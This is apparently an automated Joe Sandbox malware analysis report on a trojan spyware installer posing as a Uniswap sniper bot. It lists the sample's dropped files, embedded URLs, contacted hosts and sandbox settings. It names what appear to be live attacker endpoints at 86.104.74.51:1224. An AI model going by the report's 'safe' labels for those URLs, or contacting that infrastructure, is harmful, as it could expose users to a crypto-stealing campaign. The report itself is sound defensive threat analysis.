C:\Users\user\.pyp\DLLs\select.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\sqlite3.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\winsound.pyd	0%	ReversingLabs
C:\Users\user\.pyp\Lib\abc.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\aifc.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\argparse.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\ast.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asynchat.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\__init__.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\__main__.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_futures.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_subprocess.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_tasks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\exceptions.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\format_helpers.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\futures.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\locks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\log.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\mixins.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\proactor_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\protocols.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\queues.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\runners.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\selector_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\sslproto.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\staggered.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\streams.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\subprocess.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\taskgroups.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\tasks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\threads.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\timeouts.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\transports.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\trsock.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\unix_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\windows_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\windows_utils.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\__init__.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\_msvccompiler.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\text_file.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\unixccompiler.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\util.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\version.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\distutils\versionpredicate.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\doctest.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\_encoded_words.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\_header_value_parser.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\_policybase.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\base64mime.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\charset.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\contentmanager.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\encoders.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\errors.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\feedparser.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\generator.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\header.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\headerregistry.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\iterators.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\message.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\mime\application.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\email\mime\audio.py	0%	ReversingLabs

Source	Detection	Scanner	Label
https://eth.wiki/json-rpc/API#net_peercount	0%	Avira URL Cloud	safe
https://docs.soliditylang.org/en/latest/abi-spec.html#errors	0%	Avira URL Cloud	safe
http://crbug.com/941620allow_translate_uniform_block_to_structured_bufferThere	0%	Avira URL Cloud	safe
http://web3js.readthedocs.io/en/1.0/web3-eth-accounts.html	0%	Avira URL Cloud	safe
https://ethdocs.org/en/latest/ether.html	0%	Avira URL Cloud	safe
http://anglebug.com/4722forceRobustResourceInitForce-enable	0%	Avira URL Cloud	safe
https://myshop.amplify.com/cart/?$	0%	Avira URL Cloud	safe
https://eth.wiki/json-rpc/API#net_version	0%	Avira URL Cloud	safe
http://anglebug.com/5658GPU.ANGLE.DisplayInitializeMSFrontend	0%	Avira URL Cloud	safe
http://86.104.74.51:1224/keys	0%	Avira URL Cloud	safe
https://eips.ethereum.org/EIPS/eip-1193).	0%	Avira URL Cloud	safe
http://crbug.com/1165751Disable	0%	Avira URL Cloud	safe
http://86.104.74.51:1224/brow/7/702	0%	Avira URL Cloud	safe
http://anglebug.com/5750enableCompressingPipelineCacheInThreadPoolEnable	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dualstack.python.map.fastly.net	151.101.192.223	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
ip-api.com	208.95.112.1	true	false	high
www.python.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://86.104.74.51:1224/keys	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json	false		high
http://86.104.74.51:1224/brow/7/702	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/szmarczak/cacheable-lookup/issues/42	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://url.spec.whatwg.org/#concept-url-origin	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1996793114.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/941620allow_translate_uniform_block_to_structured_bufferThere	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/web3/web3.js/issues/6187	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/650547call_clear_twiceUsing	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/szmarczak/http2-wrapper#readme	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/maiavictor/xhr-request-promise#readme	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/sindresorhus/responselike.git	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nodejs.org/api/http.html#http_class_http_agent)	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://eth.wiki/json-rpc/API#net_peercount	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eth.wiki/json-rpc/API#net_version	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bluetooth.com/specifications/gatt/services	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/szmarczak/cacheable-lookup.git	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://web3js.readthedocs.io/en/1.0/web3-eth-accounts.html	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goo.gl/7K7WLuThe	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.soliditylang.org/en/latest/abi-spec.html#errors	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/sindresorhus/got/issues/690	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/cubedro	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goo.gl/7K7WLu	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myshop.amplify.com/cart/?$	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/szmarczak/http2-wrapper.git	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ChainSafe/web3.js/blob/8783f4d64e424456bdc53b34ef1142d0a7cee4d7/packages/web3-eth	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/110263	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/facebook/jest/issues/2549	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/joshstevens19/ethereum-bloom-filters/blob/fbeb47b70b46243c3963fe1c2988d7461ef1723	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4722forceRobustResourceInitForce-enable	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6929	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/blob/main/src/eth/execute.yaml	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromium.googlesource.com/chromium/src/	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/593024select_view_in_geometry_shaderThe	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://bit.ly/3rpDuEX.	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/593024	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/form-data/form-data	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://w3c.github.io/manifest/#installability-signals	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
http://exslt.org/common	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/nodejs/node/blob/6eec858f34a40ffa489c1ec54bb24da72a28c781/lib/internal/http2/comp	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://c.docs.google.com/	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Microsoft/TypeScript/issues/2536	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nodejs.org/api/https.html#https_class_https_agent)	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/1300575	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/710443	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/5658GPU.ANGLE.DisplayInitializeMSFrontend	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/responseXML.	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/1060012	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/web3.js/tree/1.x/packages/web3-shh	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/paulmillr/noble-hashes/issues/25#issuecomment-1750106284	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ethdocs.org/en/latest/ether.html	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3997	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/642605	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/1452	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-6.4.4).	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/1165751Disable	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ChainSafe/web3.js	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/pull/201	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-6.4).	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.bhphotovideo.com/(c/)?find/cart.jsp	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/824647	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ljharb.codes	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/blob/main/src/schemas/block.yaml#L2	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L244	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/API/FormData)	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/sindresorhus/is?sponsor=1	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/facebook/react-native/pull/1632	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-method	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.unicode.org/copyright.html	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1853457919.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://beacons.gcp.gvt2.com/domainreliability/upload	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/blueimp/JavaScript-MD5	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	false		high
https://opensource.org/licenses/MIT	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/2894	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nodejs.org/api/url.html#url_constructor_new_urlsearchparams_obj).	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://eips.ethereum.org/EIPS/eip-1193).	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/4836	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/5750enableCompressingPipelineCacheInThreadPoolEnable	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nodejs.org/api/buffer.html)	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://stackoverflow.com/a/3143231	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gist.github.com/pascaldekloe/62546103a1576803dade9269ccf76330	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.academy.com/shop/cart/?$	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pajhome.org.uk/crypt/md5	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/web3.js/tree/1.x/packages/web3-utils	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://stackoverflow.com/a/16459606/376773	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/jaredwray/keyv	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://stackoverflow.com/a/5982798/376773	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/sindresorhus/type-fest/blob/78019f42ea888b0cdceb41a4a78163868de57555/index.d.ts	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://materializecss.com)	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://android.com/pay	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://stackoverflow.com/questions/3966484/why-does-modulus-operator-return-fractional-number-in-ja	uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
86.104.74.51	unknown	Romania	50636	TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562598
Start date and time:	2024-11-25 19:03:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Detection:	MAL
Classification:	mal60.troj.spyw.winEXE@48/1644@4/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.234, 142.250.80.99, 142.251.35.163
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
